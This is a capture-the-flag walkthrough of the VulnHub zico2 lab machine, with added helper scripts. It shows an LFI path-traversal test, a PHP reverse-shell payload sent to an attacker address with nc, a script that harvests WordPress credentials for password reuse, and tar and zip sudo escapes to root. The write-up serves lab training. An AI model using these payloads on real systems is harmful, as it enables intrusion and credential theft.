Link: https://www.vulnhub.com/entry/zico2-1,210/

Initial foothold

1. Network discovery

nmap -sn 10.0.2.32/24

My target is 10.0.2.38.

2. Port scan

nmap -Pn 10.0.2.38
nmap -Pn -p1000- 10.0.2.38

There are 4 open ports: 22, 80, 111, and 57516.

3. OS and service scan

nmap -A -p22,80,111,57516 10.0.2.38

4. Vuln scan

nmap --script vuln -p22,80,111,57516 10.0.2.38
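The four scans above are one procedure: sweep the subnet, find open ports, then feed exactly those ports to the -A and --script vuln scans. The script below is an added example (not the writeup's own code) that glues steps 2 to 4 together by parsing nmap's grepable output. The sample output is constructed to mirror the four open ports found on 10.0.2.38; the TARGET variable and the "live" argument are my own conventions.

```shell
# Added example: turn nmap -oG output into the -p list for the follow-up scans.
TARGET="${TARGET:-10.0.2.38}"

# Constructed sample of `nmap -Pn -p- -oG -` output for the zico2 host.
sample_grepable() {
    printf 'Host: 10.0.2.38 ()\tStatus: Up\n'
    printf 'Host: 10.0.2.38 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/open/tcp//rpcbind///, 57516/open/tcp//status///\tIgnored State: closed (65531)\n'
}

# open_ports: grepable nmap output on stdin -> "22,80,111,57516"
# Each port entry looks like 22/open/tcp//ssh///, so field 2 is the state.
open_ports() {
    grep '^Host: .*Ports:' \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//' \
    | awk -F/ '$2 == "open" { print $1 }' \
    | sort -n | uniq | tr '\n' ',' | sed 's/,$//'
}

# full_scan HOST: steps 2-4 of the writeup in one pass. -p- covers all 65535
# ports, so a high port such as 57516 (missed by the default top-1000 scan)
# is not overlooked.
full_scan() {
    ports=$(nmap -Pn -p- -oG - "$1" | open_ports)
    [ -n "$ports" ] || { echo "no open ports found on $1" >&2; return 1; }
    nmap -A -p "$ports" "$1"
    nmap --script vuln -p "$ports" "$1"
}

# Run against the real target only when asked: sh scan.sh live
if [ "${1:-}" = "live" ]; then
    full_scan "$TARGET"
fi
```

Run it with `sh scan.sh live`; without the argument it only defines the functions, which keeps the parser testable offline.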

Service Enumeration

1. SSH port 22

Initial connection

ssh 10.0.2.38

There is no banner.

2. HTTP port 80

Nikto scan

nikto -h http://10.0.2.38

There are interesting directories, as listed in the snapshot.

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.38/ -x php,txt,html,sh,cgi -q

Access HTTP site

Viewing the page source revealed a possible LFI vulnerability.

Verify it

Intercept w/ Burp Suite and send to the Repeater

Test for LFI by editing the highlighted string in the request.

../../../../../etc/passwd

Success!!!

Access the other directories from the scan result. I came across /dbadmin, which hosts phpLiteAdmin v1.9.3.

I googled it and came across this exploit guide.

3. RPCBind port 111

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.2.38

Exploitation

1. Access the test_users database. It contains credentials for root and zico.

2. Crack the hashes with CrackStation.

3. Use the cracked passwords to log in via SSH

ssh root@10.0.2.38
ssh zico@10.0.2.38

Failed!

4. Exploit phpLiteAdmin

I will follow the exploitation guide.

Create a new database named 'hack.php'

Create new table

Supply a reverse shell command using this guide.

I used this command and saved it as the default value of a field of type TEXT:

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.32 443 >/tmp/f");?>

The file 'hack.php' is stored at '/use/database/hack.php'.

Prepare a reverse shell listener on port 443

rlwrap nc -lvp 443

Include the file through the LFI vulnerability discovered earlier.

Back to the listener, I got the shell

NOTE: Before I got the shell, I tried many commands. If you don't have the shell yet, just keep trying.

Privilege Escalation

1. Spawn a TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

2. Explore directories

cd /var/www
ls -la

Nothing useful

cd /home
ls -la
cd zico
ls -la

There's a WordPress directory

cd wordpress
cat wp-config.php

Now I have zico's MySQL credentials.

Some people reuse their credentials. I'll try them to log in as zico.

su zico
password: sWfCsfJSPV9H3AmQzw8
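Reading wp-config.php by hand works for one file, but on a real engagement there may be several WordPress installs under /home and /var/www. The script below is an added example (not the writeup's own code) that extracts DB_USER and DB_PASSWORD from every wp-config.php it can find, ready for the credential-reuse attempt. The sample config is constructed to mirror the values found in zico's WordPress directory.

```shell
# Added example: harvest WordPress database credentials for password reuse.

# Constructed sample wp-config.php mirroring the values in this writeup.
sample_wp_config() {
    cat <<'EOF'
<?php
define('DB_NAME', 'zico');
define('DB_USER', 'zico');
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
define('DB_HOST', 'localhost');
EOF
}

# wp_define NAME: print the value of define('NAME', '...') from stdin.
# Handles either quote style and surrounding whitespace.
wp_define() {
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$1['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p"
}

# harvest_wp_creds DIR...: one line per config, "path<TAB>user:password".
# Unreadable directories are skipped quietly (find errors go to /dev/null).
harvest_wp_creds() {
    find "$@" -name wp-config.php 2>/dev/null | while IFS= read -r f; do
        u=$(wp_define DB_USER < "$f")
        p=$(wp_define DB_PASSWORD < "$f")
        [ -n "$u" ] || continue
        printf '%s\t%s:%s\n' "$f" "$u" "$p"
    done
}

# Typical use from the www-data shell: harvest_wp_creds /home /var/www
# then try each password with `su <user>` and `ssh <user>@10.0.2.38`.
```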

Now I'm zico. Next, check the sudo rights.

sudo -l

I have 2 methods to escalate my privileges to root.

Starting with tar, I used this guide.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
whoami
cd /root
ls -la
cat flag.txt

Now I’m root.

Another method is zip.

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
whoami

Now, I’m root.
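Both escalations rest on the same fact: sudo lets zico run tar and zip as root, and both binaries can execute an arbitrary command (tar via --checkpoint-action=exec, zip via the -TT test command, where 'sh #' comments out the archive name zip appends). The script below is an added example, not the writeup's own code, that parses `sudo -l` output, flags entries with a known escape and prints the matching one-liner. The sample `sudo -l` output is constructed to mirror what zico sees; the escape table only contains the two binaries this writeup uses.

```shell
# Added example: audit `sudo -l` output for binaries with a known shell escape.

# Constructed sample of `sudo -l` as seen by zico.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for zico on this host:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
EOF
}

# sudo_allowed: `sudo -l` output on stdin -> one allowed command path per line.
# Matches "(user) [NOPASSWD:] /path/to/bin ..." and keeps only the path.
sudo_allowed() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*\(NOPASSWD:[[:space:]]*\)*\([^[:space:]]*\).*/\2/p'
}

# escape_for BASENAME: print the root-shell one-liner for that binary, or fail.
# tar: --checkpoint-action=exec runs a command inside the root tar process.
# zip: -T tests the archive and -TT replaces the test command; 'sh #' turns the
#      archive name zip appends into a comment.
escape_for() {
    case "$1" in
        tar) cat <<'EOF'
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
EOF
        ;;
        zip) cat <<'EOF'
TF=$(mktemp -u); sudo zip "$TF" /etc/hosts -T -TT 'sh #'
EOF
        ;;
        *) return 1 ;;
    esac
}

# sudo_escapes: `sudo -l` output on stdin -> "path => escape" per escapable entry
sudo_escapes() {
    sudo_allowed | while IFS= read -r path; do
        if esc=$(escape_for "$(basename "$path")"); then
            printf '%s => %s\n' "$path" "$esc"
        fi
    done
}

# sh sudo_audit.sh live   -> run against the current user's real sudo rights
if [ "${1:-}" = "live" ]; then
    sudo -l | sudo_escapes
fi
```

Extending the escape table is the natural next step; the point of keeping the parser separate from the table is that a defender can run the same parser over sudoers policy exports and reject any rule that grants an escapable binary without restricting its arguments.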